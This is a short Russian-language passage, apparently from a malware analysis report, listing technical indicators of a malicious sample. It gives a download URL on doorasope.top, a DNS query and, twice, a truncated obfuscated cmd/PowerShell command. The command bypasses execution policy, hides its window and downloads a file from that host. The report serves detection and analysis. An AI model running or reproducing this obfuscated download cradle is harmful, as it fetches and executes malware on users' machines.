Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwe^rsH^ELl.^EX^E^ -^EXE^CUtiO^nPOlicy^ b^yPASS ^-^NO^proF^IlE ^-^w^in^do^WS^tyLe hIDd^eN^ (NEw-O^Bjec^T sys^T^EM.^nE^T.W^EB^CliE^Nt^).dOwn^lo^Ad^Fi^le('http://www.doorasope.top...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pOwe^rsH^ELl.^EX^E^ -^EXE^CUtiO^nPOlicy^ b^yPASS ^-^NO^proF^IlE ^-^w^in^do^WS^tyLe hIDd^eN^ (NEw-O^Bjec^T sys^T^EM.^nE^T.W^EB^CliE^Nt^).dOwn^lo^Ad^Fi^le('http://www.doorasope.top...' (со скрытым окном)